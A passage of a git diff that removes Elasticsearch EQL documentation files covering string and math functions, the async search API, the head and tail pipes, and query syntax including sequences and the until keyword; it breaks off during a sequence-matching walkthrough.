-number("1337", null) // returns 1337 ----- - -*Syntax* -[source,txt] ----- -number([, ]) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -String to convert to an integer or float. If this value is a string, it must be -one of the following: - -* A string representation of an integer (e.g., `"42"`) -* A string representation of a float (e.g., `"9.5"`) -* If the `` parameter is specified, a string containing an integer - literal in the base notation (e.g., `"0xDECAFBAD"` in hexadecimal or base - `16`) - -Strings that begin with `0x` are auto-detected as hexadecimal and use a default -`` of `16`. - -`-` and `+` are supported with no space between. Surrounding whitespace is -ignored. Empty strings (`""`) are not supported. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field - -If this argument is `null`, the function returns `null`. --- - -``:: -+ --- -(Optional, integer or `null`) -Radix or base used to convert the string. If the `` begins with `0x`, -this parameter defaults to `16` (hexadecimal). Otherwise, it defaults to base -`10`. - -If this argument is explicitly `null`, the default value is used. - -Fields are not supported as arguments. --- - -*Returns:* integer or float or `null` - -[discrete] -[[eql-fn-startswith]] -=== `startsWith` - -Returns `true` if a source string begins with a provided substring. Matching is -case-sensitive. - -*Example* -[source,eql] ----- -startsWith("regsvr32.exe", "regsvr32") // returns true -startsWith("regsvr32.exe", "explorer") // returns false -startsWith("", "") // returns true - -// process.name = "regsvr32.exe" -startsWith(process.name, "regsvr32") // returns true -startsWith(process.name, "explorer") // returns false - -// process.name = "regsvr32" -startsWith("regsvr32.exe", process.name) // returns true -startsWith("explorer.exe", process.name) // returns false - -// null handling -startsWith("regsvr32.exe", null) // returns null -startsWith("", null) // returns null -startsWith(null, "regsvr32") // returns null -startsWith(null, null) // returns null ----- - -*Syntax* -[source,txt] ----- -startsWith(, ) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -Source string. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string or `null`) -Substring to search for. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -*Returns:* boolean or `null` - -[discrete] -[[eql-fn-string]] -=== `string` - -Converts a value to a string. - -*Example* -[source,eql] ----- -string(42) // returns "42" -string(42.5) // returns "42.5" -string("regsvr32.exe") // returns "regsvr32.exe" -string(true) // returns "true" - -// null handling -string(null) // returns null ----- - -*Syntax* -[source,txt] ----- -string() ----- - -*Parameters* - -``:: -(Required) -Value to convert to a string. If `null`, the function returns `null`. -+ -If using a field as the argument, this parameter does not support the -<> field data type. - -*Returns:* string or `null` - -[discrete] -[[eql-fn-stringcontains]] -=== `stringContains` - -Returns `true` if a source string contains a provided substring. 
Matching is
-case-sensitive.
-
-*Example*
-[source,eql]
-----
-// process.command_line = "start regsvr32.exe"
-stringContains(process.command_line, "regsvr32") // returns true
-stringContains(process.command_line, "start ") // returns true
-stringContains(process.command_line, "explorer") // returns false
-
-// process.name = "regsvr32.exe"
-stringContains(process.command_line, process.name) // returns true
-
-// empty strings
-stringContains("", "") // returns false
-stringContains(process.command_line, "") // returns false
-
-// null handling
-stringContains(null, "regsvr32") // returns null
-stringContains(process.command_line, null) // returns null
-----
-
-*Syntax*
-[source,txt]
-----
-stringContains(, )
-----
-
-*Parameters*
-
-``::
-(Required, string or `null`)
-Source string to search. If `null`, the function returns `null`.
-
-If using a field as the argument, this parameter supports only the following
-field data types:
-
-* A type in the <> family
-* <> field with a <> sub-field
-
-``::
-(Required, string or `null`)
-Substring to search for. If `null`, the function returns `null`.
-
-If using a field as the argument, this parameter supports only the following
-field data types:
-
-* A type in the <> family
-* <> field with a <> sub-field
-
-*Returns:* boolean or `null`
-
-[discrete]
-[[eql-fn-substring]]
-=== `substring`
-
-Extracts a substring from a source string at provided start and end positions.
-
-If no end position is provided, the function extracts the remaining string.
-
-*Example*
-[source,eql]
-----
-substring("start regsvr32.exe", 6) // returns "regsvr32.exe"
-substring("start regsvr32.exe", 0, 5) // returns "start"
-substring("start regsvr32.exe", 6, 14) // returns "regsvr32"
-substring("start regsvr32.exe", -4) // returns ".exe"
-substring("start regsvr32.exe", -4, -1) // returns ".ex"
-----
-
-*Syntax*
-[source,txt]
-----
-substring(, [, ])
-----
-
-*Parameters*
-
-``::
-(Required, string)
-Source string.
-
-``::
-+
---
-(Required, integer)
-Starting position for extraction.
-
-If this position is higher than the `` position or the length of the
-`` string, the function returns an empty string.
-
-Positions are zero-indexed. Negative offsets are supported.
---
-
-``::
-(Optional, integer)
-Exclusive end position for extraction. If this position is not provided, the
-function returns the remaining string.
-+
-Positions are zero-indexed. Negative offsets are supported.
-
-*Returns:* string
-
-[discrete]
-[[eql-fn-subtract]]
-=== `subtract`
-Returns the difference between a provided minuend and subtrahend.
-
-*Example*
-[source,eql]
-----
-subtract(10, 2) // returns 8
-subtract(10.5, 0.5) // returns 10
-subtract(1, 0.2) // returns 0.8
-subtract(-2, 4) // returns -6
-subtract(-2, -4) // returns 2
-
-// process.args_count = 10
-subtract(process.args_count, 6) // returns 4
-subtract(process.args_count, 5) // returns 5
-subtract(15, process.args_count) // returns 5
-subtract(process.args_count, 0.5) // returns 9.5
-
-// process.parent.args_count = 6
-subtract(process.args_count, process.parent.args_count) // returns 4
-
-// null handling
-subtract(null, 2) // returns null
-subtract(2, null) // returns null
-----
-
-*Syntax*
-[source,txt]
-----
-subtract(, )
-----
-
-*Parameters*
-
-``::
-(Required, integer or float or `null`)
-Minuend to subtract from.
-+
-If using a field as the argument, this parameter supports only
-<> field data types.
-
-``::
-(Optional, integer or float or `null`)
-Subtrahend to subtract. If `null`, the function returns `null`.
-+ -If using a field as the argument, this parameter supports only -<> field data types. - -*Returns:* integer, float, or `null` - -[discrete] -[[eql-fn-wildcard]] -=== `wildcard` - -Returns `true` if a source string matches one or more provided wildcard -expressions. Matching is case-sensitive. - -*Example* -[source,eql] ----- -// process.name = "regsvr32.exe" -wildcard(process.name, "*regsvr32*") // returns true -wildcard(process.name, "*regsvr32*", "*explorer*") // returns true -wildcard(process.name, "*explorer*") // returns false -wildcard(process.name, "*explorer*", "*scrobj*") // returns false - -// empty strings -wildcard("", "*start*") // returns false -wildcard("", "*") // returns true -wildcard("", "") // returns true - -// null handling -wildcard(null, "*regsvr32*") // returns null -wildcard(process.name, null) // returns null ----- - -*Syntax* -[source,txt] ----- -wildcard(, [, ...]) ----- - -*Parameters* - -``:: -+ --- -(Required, string) -Source string. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required{multi-arg-ref}, string) -Wildcard expression used to match the source string. If `null`, the function -returns `null`. Fields are not supported as arguments. --- - -*Returns:* boolean diff --git a/docs/reference/eql/get-async-eql-search-api.asciidoc b/docs/reference/eql/get-async-eql-search-api.asciidoc deleted file mode 100644 index 65f88cf7c88..00000000000 --- a/docs/reference/eql/get-async-eql-search-api.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[get-async-eql-search-api]] -=== Get async EQL search API -++++ -Get async EQL search -++++ - -beta::[] - -Returns the current status and available results for an <> or a <>. - -[source,console] ----- -GET /_eql/search/FkpMRkJGS1gzVDRlM3g4ZzMyRGlLbkEaTXlJZHdNT09TU2VTZVBoNDM3cFZMUToxMDM= ----- -// TEST[skip: no access to search ID] - -[[get-async-eql-search-api-request]] -==== {api-request-title} - -`GET /_eql/search/` - -[[get-async-eql-search-api-prereqs]] -==== {api-prereq-title} - -See <>. - -[[get-async-eql-search-api-limitations]] -===== Limitations - -See <>. - -[[get-async-eql-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Identifier for the search. -+ -A search ID is provided in the <>'s response for -an <>. A search ID is also provided if the -request's <> parameter -is `true`. - -[[get-async-eql-search-api-query-params]] -==== {api-query-parms-title} - -`keep_alive`:: -(Optional, <>) -Period for which the search and its results are stored on the cluster. Defaults -to the `keep_alive` value set by the search's <> request. -+ -If specified, this parameter sets a new `keep_alive` period for the search, -starting when the get async EQL search API request executes. This new period -overwrites the one specified in the EQL search API request. -+ -When this period expires, the search and its results are deleted, even if the -search is ongoing. - -`wait_for_completion_timeout`:: -(Optional, <>) -Timeout duration to wait for the request to finish. Defaults to no timeout, -meaning the request waits for complete search results. -+ -If this parameter is specified and the request completes during this period, -complete search results are returned. -+ -If the request does not complete during this period, the response returns an -`is_partial` value of `true` and no search results. 
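-
-For example, the following request (a minimal sketch that reuses the
-placeholder search ID from the example above) sets a new five-day retention
-period and waits up to two seconds for complete results:
-
-[source,console]
-----
-GET /_eql/search/FkpMRkJGS1gzVDRlM3g4ZzMyRGlLbkEaTXlJZHdNT09TU2VTZVBoNDM3cFZMUToxMDM=?keep_alive=5d&wait_for_completion_timeout=2s
-----
-// TEST[skip: no access to search ID]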
- -[role="child_attributes"] -[[get-async-eql-search-api-response-body]] -==== {api-response-body-title} - -The async EQL search API returns the same response body as the EQL search API. -See the EQL search API's <>. \ No newline at end of file diff --git a/docs/reference/eql/pipes.asciidoc b/docs/reference/eql/pipes.asciidoc deleted file mode 100644 index 9925f5c4f32..00000000000 --- a/docs/reference/eql/pipes.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql-pipe-ref]] -== EQL pipe reference -++++ -Pipe reference -++++ - -beta::[] - -{es} supports the following <>. - -[discrete] -[[eql-pipe-head]] -=== `head` - -Returns up to a specified number of events or sequences, starting with the -earliest matches. Works similarly to the -{wikipedia}/Head_(Unix)[Unix head command]. - -*Example* - -The following EQL query returns up to three of the earliest powershell -commands. - -[source,eql] ----- -process where process.name == "powershell.exe" -| head 3 ----- - -*Syntax* -[source,txt] ----- -head ----- - -*Parameters* - -``:: -(Required, integer) -Maximum number of matching events or sequences to return. - -[discrete] -[[eql-pipe-tail]] -=== `tail` - -Returns up to a specified number of events or sequences, starting with the most -recent matches. Works similarly to the -{wikipedia}/Tail_(Unix)[Unix tail command]. - -*Example* - -The following EQL query returns up to five of the most recent `svchost.exe` -processes. - -[source,eql] ----- -process where process.name == "svchost.exe" -| tail 5 ----- - -*Syntax* -[source,txt] ----- -tail ----- - -*Parameters* - -``:: -(Required, integer) -Maximum number of matching events or sequences to return. diff --git a/docs/reference/eql/syntax.asciidoc b/docs/reference/eql/syntax.asciidoc deleted file mode 100644 index 2607f6ae6fd..00000000000 --- a/docs/reference/eql/syntax.asciidoc +++ /dev/null @@ -1,972 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql-syntax]] -== EQL syntax reference -++++ -Syntax reference -++++ - -beta::[] - -[discrete] -[[eql-basic-syntax]] -=== Basic syntax - -EQL queries require an event category and a matching condition. The `where` -keyword connects them. - -[source,eql] ----- -event_category where condition ----- - -For example, the following EQL query matches `process` events with a -`process.name` field value of `svchost.exe`: - -[source,eql] ----- -process where process.name == "svchost.exe" ----- - -[discrete] -[[eql-syntax-event-categories]] -=== Event categories - -An event category is a valid, indexed value of the -<>. You can set the event category -field using the `event_category_field` parameter of the EQL search API. - -[discrete] -[[eql-syntax-match-any-event-category]] -=== Match any event category - -To match events of any category, use the `any` keyword. You can also use the -`any` keyword to search for documents without a event category field. 
- -For example, the following EQL query matches any documents with a -`network.protocol` field value of `http`: - -[source,eql] ----- -any where network.protocol == "http" ----- - -[discrete] -[[eql-syntax-escape-an-event-category]] -=== Escape an event category - -Use enclosing double quotes (`"`) or three enclosing double quotes (`"""`) to -escape event categories that: - -* Contain a special character, such as a hyphen (`-`) or dot (`.`) -* Contain a space -* Start with a numeral - -[source,eql] ----- -".my.event.category" -"my-event-category" -"my event category" -"6eventcategory" - -""".my.event.category""" -"""my-event-category""" -"""my event category""" -"""6eventcategory""" ----- - -[discrete] -[[eql-syntax-escape-a-field-name]] -=== Escape a field name - -Use enclosing enclosing backticks (+++`+++) to escape field names that: - -* Contain a hyphen (`-`) -* Contain a space -* Start with a numeral - -[source,eql] ----- -`my-field` -`my field` -`6myfield` ----- - -Use double backticks (+++``+++) to escape any backticks (+++`+++) in the field -name. - -[source,eql] ----- -my`field -> `my``field` ----- - -[discrete] -[[eql-syntax-conditions]] -=== Conditions - -A condition consists of one or more criteria an event must match. -You can specify and combine these criteria using the following operators. Most -EQL operators are case-sensitive by default. - -[discrete] -[[eql-syntax-comparison-operators]] -=== Comparison operators - -[source,eql] ----- -< <= == : != >= > ----- - -`<` (less than):: -Returns `true` if the value to the left of the operator is less than the value -to the right. Otherwise returns `false`. - -`<=` (less than or equal) :: -Returns `true` if the value to the left of the operator is less than or equal to -the value to the right. Otherwise returns `false`. - -`==` (equal, case-sensitive):: -Returns `true` if the values to the left and right of the operator are equal. -Otherwise returns `false`. For strings, matching is case-sensitive. - -`:` (equal, case-insensitive):: -Returns `true` if strings to the left and right of the operator are equal. -Otherwise returns `false`. Matching is case-insensitive and can only be used to -compare strings. - -[IMPORTANT] -==== -Avoid using the `==` or `:` operators to perform exact matching on -<> field values. - -By default, {es} changes the values of `text` fields as part of <>. This can make finding exact matches for `text` field values -difficult. - -To search `text` fields, consider using a <> that contains a <> query. -==== - -`!=` (not equal, case-sensitive):: -Returns `true` if the values to the left and right of the operator are not -equal. Otherwise returns `false`. For strings, matching is case-sensitive. - -`>=` (greater than or equal) :: -Returns `true` if the value to the left of the operator is greater than or equal -to the value to the right. Otherwise returns `false`. When comparing strings, -the operator uses a case-sensitive lexicographic order. - -`>` (greater than):: -Returns `true` if the value to the left of the operator is greater than the -value to the right. Otherwise returns `false`. When comparing strings, -the operator uses a case-sensitive lexicographic order. - -NOTE: `=` is not supported as an equal operator. Use `==` or `:` instead. - -You cannot chain comparison operators. Instead, use a -<> between comparisons. For -example, `foo < bar <= baz` is not supported. However, you can rewrite the -expression as `foo < bar and bar <= baz`, which is supported. 
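-
-As a concrete sketch, a range check such as `1 < process.args_count <= 4`
-(the `process.args_count` field here is only illustrative) would instead be
-written as two comparisons joined by `and`:
-
-[source,eql]
-----
-process where process.args_count > 1 and process.args_count <= 4
-----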
-
-You also cannot use comparison operators to compare a field to another field. This applies even if the fields are changed using a <>.
-
-*Example* +
-The following EQL query compares the `process.parent.name` field
-value to a static value, `foo`. This comparison is supported.
-
-However, the query also compares the `process.parent.name` field value to the
-`process.name` field. This comparison is not supported and will return an
-error for the entire query.
-
-[source,eql]
-----
-process where process.parent.name == "foo" and process.parent.name == process.name
-----
-
-Instead, you can rewrite the query to compare both the `process.parent.name`
-and `process.name` fields to static values.
-
-[source,eql]
-----
-process where process.parent.name == "foo" and process.name == "foo"
-----
-
-[discrete]
-[[eql-syntax-logical-operators]]
-=== Logical operators
-
-[source,eql]
-----
-and or not
-----
-
-`and`::
-Returns `true` only if the condition to the left and right _both_ return `true`.
-Otherwise returns `false`.
-
-`or`::
-Returns `true` if one of the conditions to the left or right is `true`.
-Otherwise returns `false`.
-
-`not`::
-Returns `true` if the condition to the right is `false`.
-
-[discrete]
-[[eql-syntax-lookup-operators]]
-=== Lookup operators
-
-[source,eql]
-----
-user.name in ("Administrator", "SYSTEM", "NETWORK SERVICE")
-user.name not in ("Administrator", "SYSTEM", "NETWORK SERVICE")
-----
-
-`in` (case-sensitive)::
-Returns `true` if the value is contained in the provided list. For strings,
-matching is case-sensitive.
-
-`not in` (case-sensitive)::
-Returns `true` if the value is not contained in the provided list. For strings,
-matching is case-sensitive.
-
-[discrete]
-[[eql-syntax-math-operators]]
-=== Math operators
-
-[source,eql]
-----
-+ - * / %
-----
-
-`+` (add)::
-Adds the values to the left and right of the operator.
-
-`-` (subtract)::
-Subtracts the value to the right of the operator from the value to the left.
-
-`*` (multiply)::
-Multiplies the values to the left and right of the operator.
-
-`/` (divide)::
-Divides the value to the left of the operator by the value to the right.
-+
-[[eql-divide-operator-float-rounding]]
-[WARNING]
-====
-If both the dividend and divisor are integers, the divide (`/`) operation
-_rounds down_ any returned floating point numbers to the nearest integer. To
-avoid rounding, convert either the dividend or divisor to a float.
-
-*Example* +
-The `process.args_count` field is a <> integer field containing a
-count of process arguments.
-
-A user might expect the following EQL query to only match events with a
-`process.args_count` value of `4`.
-
-[source,eql]
-----
-process where ( 4 / process.args_count ) == 1
-----
-
-However, the EQL query matches events with a `process.args_count` value of `3`
-or `4`.
-
-For events with a `process.args_count` value of `3`, the divide operation
-returns a float of `1.333...`, which is rounded down to `1`.
-
-To match only events with a `process.args_count` value of `4`, convert
-either the dividend or divisor to a float.
-
-The following EQL query changes the integer `4` to the equivalent float `4.0`.
-
-[source,eql]
-----
-process where ( 4.0 / process.args_count ) == 1
-----
-====
-
-`%` (modulo)::
-Divides the value to the left of the operator by the value to the right. Returns only the remainder.
-
-[discrete]
-[[eql-syntax-match-any-condition]]
-=== Match any condition
-
-To match events solely on event category, use the `where true` condition.
- -For example, the following EQL query matches any `file` events: - -[source,eql] ----- -file where true ----- - -To match any event, you can combine the `any` keyword with the `where true` -condition: - -[source,eql] ----- -any where true ----- - -[discrete] -[[eql-syntax-strings]] -=== Strings - -Strings are enclosed in double quotes (`"`). - -[source,eql] ----- -"hello world" ----- - -Strings enclosed in single quotes (`'`) are not supported. - -[discrete] -[[eql-syntax-escape-characters]] -=== Escape characters in a string - -When used within a string, special characters, such as a carriage return or -double quote (`"`), must be escaped with a preceding backslash (`\`). - -[source,eql] ----- -"example \r of \" escaped \n characters" ----- - -[options="header"] -|==== -| Escape sequence | Literal character -|`\n` | A newline (linefeed) character -|`\r` | A carriage return character -|`\t` | A tab character -|`\\` | A backslash (`\`) character -|`\"` | A double quote (`"`) character -|==== - -IMPORTANT: The single quote (`'`) character is reserved for future use. You -cannot use an escaped single quote (`\'`) for literal strings. Use an escaped -double quote (`\"`) instead. - -[discrete] -[[eql-syntax-raw-strings]] -=== Raw strings - -Raw strings treat special characters, such as backslashes (`\`), as literal -characters. Raw strings are enclosed in three double quotes (`"""`). - -[source,eql] ----- -"""Raw string with a literal double quote " and blackslash \ included""" ----- - -A raw string cannot contain three consecutive double quotes (`"""`). Instead, -use a regular string with the `\"` escape sequence. - -[source,eql] ----- -"String containing \"\"\" three double quotes" ----- - -[discrete] -[[eql-sequences]] -=== Sequences - -You can use EQL sequences to describe and match an ordered series of events. -Each item in a sequence is an event category and event condition, -surrounded by square brackets (`[ ]`). Events are listed in ascending -chronological order, with the most recent event listed last. - -[source,eql] ----- -sequence - [ event_category_1 where condition_1 ] - [ event_category_2 where condition_2 ] - ... ----- - -*Example* + -The following EQL sequence query matches this series of ordered events: - -. Start with an event with: -+ --- -* An event category of `file` -* A `file.extension` of `exe` --- -. Followed by an event with an event category of `process` - -[source,eql] ----- -sequence - [ file where file.extension == "exe" ] - [ process where true ] ----- - -[discrete] -[[eql-with-maxspan-keywords]] -=== `with maxspan` keywords - -You can use the `with maxspan` keywords to constrain a sequence to a specified -timespan. All events in a matching sequence must occur within this duration, -starting at the first event's timestamp. - -The `maxspan` keyword accepts <> arguments. - -[source,eql] ----- -sequence with maxspan=30s - [ event_category_1 where condition_1 ] by field_baz - [ event_category_2 where condition_2 ] by field_bar - ... ----- - -*Example* + -The following sequence query uses a `maxspan` value of `15m` (15 minutes). -Events in a matching sequence must occur within 15 minutes of the first event's -timestamp. - -[source,eql] ----- -sequence with maxspan=15m - [ file where file.extension == "exe" ] - [ process where true ] ----- - -[discrete] -[[eql-by-keyword]] -=== `by` keyword - -You can use the `by` keyword with sequences to only match events that share the -same field values. 
If a field value should be shared across all events, you -can use `sequence by`. - -[source,eql] ----- -sequence by field_foo - [ event_category_1 where condition_1 ] by field_baz - [ event_category_2 where condition_2 ] by field_bar - ... ----- - -*Example* + -The following sequence query uses the `by` keyword to constrain matching events -to: - -* Events with the same `user.name` value -* `file` events with a `file.path` value equal to the following `process` - event's `process.path` value. - -[source,eql] ----- -sequence - [ file where file.extension == "exe" ] by user.name, file.path - [ process where true ] by user.name, process.path ----- - -Because the `user.name` field is shared across all events in the sequence, it -can be included using `sequence by`. The following sequence is equivalent to the -prior one. - -[source,eql] ----- -sequence by user.name - [ file where file.extension == "exe" ] by file.path - [ process where true ] by process.path ----- - -You can combine the `sequence by` and `with maxspan` keywords to constrain a -sequence by both field values and a timespan. - -[source,eql] ----- -sequence by field_foo with maxspan=30s - [ event_category_1 where condition_1 ] by field_baz - [ event_category_2 where condition_2 ] by field_bar - ... ----- - -*Example* + -The following sequence query uses the `sequence by` keyword and `with maxspan` -keywords to match only a sequence of events that: - -* Share the same `user.name` field values -* Occur within `15m` (15 minutes) of the first matching event - -[source,eql] ----- -sequence by user.name with maxspan=15m - [ file where file.extension == "exe" ] by file.path - [ process where true ] by process.path ----- - -[discrete] -[[eql-until-keyword]] -=== `until` keyword - -You can use the `until` keyword to specify an expiration event for a sequence. -If this expiration event occurs _between_ matching events in a sequence, the -sequence expires and is not considered a match. If the expiration event occurs -_after_ matching events in a sequence, the sequence is still considered a -match. The expiration event is not included in the results. - -[source,eql] ----- -sequence - [ event_category_1 where condition_1 ] - [ event_category_2 where condition_2 ] - ... -until [ event_category_3 where condition_3 ] ----- - -*Example* + -A dataset contains the following event sequences, grouped by shared IDs: - -[source,txt] ----- -A, B -A, B, C -A, C, B ----- - -The following EQL query searches the dataset for sequences containing -event `A` followed by event `B`. Event `C` is used as an expiration event. - -[source,eql] ----- -sequence by ID - A - B -until C ----- - -The query matches sequences `A, B` and `A, B, C` but not `A, C, B`. - -[TIP] -==== -The `until` keyword can be useful when searching for process sequences in -Windows event logs. - -In Windows, a process ID (PID) is unique only while a process is running. After -a process terminates, its PID can be reused. - -You can search for a sequence of events with the same PID value using the `by` -and `sequence by` keywords. - -*Example* + -The following EQL query uses the `sequence by` keyword to match a -sequence of events that share the same `process.pid` value. - -[source,eql] ----- -sequence by process.pid - [ process where event.type == "start" and process.name == "cmd.exe" ] - [ process where file.extension == "exe" ] ----- - -However, due to PID reuse, this can result in a matching sequence that -contains events across unrelated processes. 
To prevent false positives, you can -use the `until` keyword to end matching sequences before a process termination -event. - -The following EQL query uses the `until` keyword to end sequences before -`process` events with an `event.type` of `stop`. These events indicate a process -has been terminated. - -[source,eql] ----- -sequence by process.pid - [ process where event.type == "start" and process.name == "cmd.exe" ] - [ process where file.extension == "exe" ] -until [ process where event.type == "stop" ] ----- -==== - -[discrete] -[[eql-functions]] -=== Functions - -You can use EQL functions to convert data types, perform math, manipulate -strings, and more. Most functions are case-sensitive by default. - -For a list of supported functions, see <>. - -[TIP] -==== -Using functions in EQL queries can result in slower search speeds. If you -often use functions to transform indexed data, you can speed up search by making -these changes during indexing instead. However, that often means slower index -speeds. - -*Example* + -An index contains the `file.path` field. `file.path` contains the full path to a -file, including the file extension. - -When running EQL searches, users often use the `endsWith` function with the -`file.path` field to match file extensions: - -[source,eql] ----- -file where endsWith(file.path,".exe") or endsWith(file.path,".dll") ----- - -While this works, it can be repetitive to write and can slow search speeds. To -speed up search, you can do the following instead: - -. <>, `file.extension`, to the index. The - `file.extension` field will contain only the file extension from the - `file.path` field. -. Use an <> containing the <> - processor or another preprocessor tool to extract the file extension from the - `file.path` field before indexing. -. Index the extracted file extension to the `file.extension` field. - -These changes may slow indexing but allow for faster searches. Users -can use the `file.extension` field instead of multiple `endsWith` function -calls: - -[source,eql] ----- -file where file.extension in ("exe", "dll") ----- - -We recommend testing and benchmarking any indexing changes before deploying them -in production. See <> and <>. -==== - -[discrete] -[[eql-pipes]] -=== Pipes - -EQL pipes filter, aggregate, and post-process events returned by -an EQL query. You can use pipes to narrow down EQL query results or make them -more specific. - -Pipes are delimited using the pipe (`|`) character. - -[source,eql] ----- -event_category where condition | pipe ----- - -*Example* + -The following EQL query uses the `tail` pipe to return only the 10 most recent -events matching the query. - -[source,eql] ----- -authentication where agent.id == 4624 -| tail 10 ----- - -You can pass the output of a pipe to another pipe. This lets you use multiple -pipes with a single query. - -For a list of supported pipes, see <>. - -[discrete] -[[eql-syntax-limitations]] -=== Limitations - -EQL does not support the following features and syntax. - -[discrete] -[[eql-compare-fields]] -==== Comparing fields - -You cannot use EQL comparison operators to compare a field to -another field. This applies even if the fields are changed using a -<>. - -[discrete] -[[eql-array-fields]] -==== Array field values are not supported - -EQL does not support <> field values, also known as -multi-value fields. EQL searches on array field values may return inconsistent -results. 
- -[discrete] -[[eql-nested-fields]] -==== EQL search on nested fields - -You cannot use EQL to search the values of a <> field or the -sub-fields of a `nested` field. However, data streams and indices containing -`nested` field mappings are otherwise supported. - -[discrete] -[[eql-unsupported-syntax]] -==== Differences from Endgame EQL syntax - -{es} EQL differs from the {eql-ref}/index.html[Elastic Endgame EQL syntax] as -follows: - -* Most operators and functions in {es} EQL are case-sensitive. For -case-insensitive equality comparisons, use the `:` operator. - -* Comparisons using the `==` and `!=` operators do not expand wildcard -characters. For example, `process_name == "cmd*.exe"` interprets `*` as a -literal asterisk, not a wildcard. For case-sensitive wildcard matching, use the -<> function. - -* `=` cannot be substituted for the `==` operator. - -* Strings enclosed in single quotes (`'`) are not supported. Enclose strings in -double quotes (`"`) instead. - -* `?"` and `?'` do not indicate raw strings. Enclose raw strings in -three double quotes (`"""`) instead. - -* {es} EQL does not support: - -** Array functions: -*** {eql-ref}/functions.html#arrayContains[`arrayContains`] -*** {eql-ref}/functions.html#arrayCount[`arrayCount`] -*** {eql-ref}/functions.html#arraySearch[`arraySearch`] - -** The {eql-ref}//functions.html#match[`match`] function - -** {eql-ref}/joins.html[Joins] - -** {eql-ref}/basic-syntax.html#event-relationships[Lineage-related keywords]: -*** `child of` -*** `descendant of` -*** `event of` - -** The following {eql-ref}/pipes.html[pipes]: -*** {eql-ref}/pipes.html#count[`count`] -*** {eql-ref}/pipes.html#filter[`filter`] -*** {eql-ref}/pipes.html#sort[`sort`] -*** {eql-ref}/pipes.html#unique[`unique`] -*** {eql-ref}/pipes.html#unique-count[`unique_count`] - -[discrete] -[[eql-how-sequence-queries-handle-matches]] -==== How sequence queries handle matches - -<> don't find all potential matches for a -sequence. This approach would be too slow and costly for large event data sets. -Instead, a sequence query handles pending sequence matches as a -{wikipedia}/Finite-state_machine[state machine]: - -* Each event item in the sequence query is a state in the machine. -* Only one pending sequence can be in each state at a time. -* If two pending sequences are in the same state at the same time, the most -recent sequence overwrites the older one. -* If the query includes <>, the query uses a -separate state machine for each unique `by` field value. 
- -.*Example* -[%collapsible] -==== -A data set contains the following `process` events in ascending chronological -order: - -[source,js] ----- -{ "index" : { "_id": "1" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -{ "index" : { "_id": "2" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -{ "index" : { "_id": "3" } } -{ "user": { "name": "elkbee" }, "process": { "name": "bash" }, ...} -{ "index" : { "_id": "4" } } -{ "user": { "name": "root" }, "process": { "name": "bash" }, ...} -{ "index" : { "_id": "5" } } -{ "user": { "name": "root" }, "process": { "name": "bash" }, ...} -{ "index" : { "_id": "6" } } -{ "user": { "name": "elkbee" }, "process": { "name": "attrib" }, ...} -{ "index" : { "_id": "7" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -{ "index" : { "_id": "8" } } -{ "user": { "name": "elkbee" }, "process": { "name": "bash" }, ...} -{ "index" : { "_id": "9" } } -{ "user": { "name": "root" }, "process": { "name": "cat" }, ...} -{ "index" : { "_id": "10" } } -{ "user": { "name": "elkbee" }, "process": { "name": "cat" }, ...} -{ "index" : { "_id": "11" } } -{ "user": { "name": "root" }, "process": { "name": "cat" }, ...} ----- -// NOTCONSOLE - -An EQL sequence query searches the data set: - -[source,eql] ----- -sequence by user.name - [process where process.name == "attrib"] - [process where process.name == "bash"] - [process where process.name == "cat"] ----- - -The query's event items correspond to the following states: - -* State A: `[process where process.name == "attrib"]` -* State B: `[process where process.name == "bash"]` -* Complete: `[process where process.name == "cat"]` - -image::images/eql/sequence-state-machine.svg[align="center"] - -To find matching sequences, the query uses separate state machines for each -unique `user.name` value. Based on the data set, you can expect two state -machines: one for the `root` user and one for `elkbee`. - -image::images/eql/separate-state-machines.svg[align="center"] - -Pending sequence matches move through each machine's states as follows: - -[source,txt] ----- -{ "index" : { "_id": "1" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -// Creates sequence [1] in state A for the "root" user. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [1] | | | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "2" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -// Creates sequence [2] in state A for "root", overwriting sequence [1]. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [2] | | | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "3" } } -{ "user": { "name": "elkbee" }, "process": { "name": "bash" }, ...} -// Nothing happens. The "elkbee" user has no pending sequence to move -// from state A to state B. 
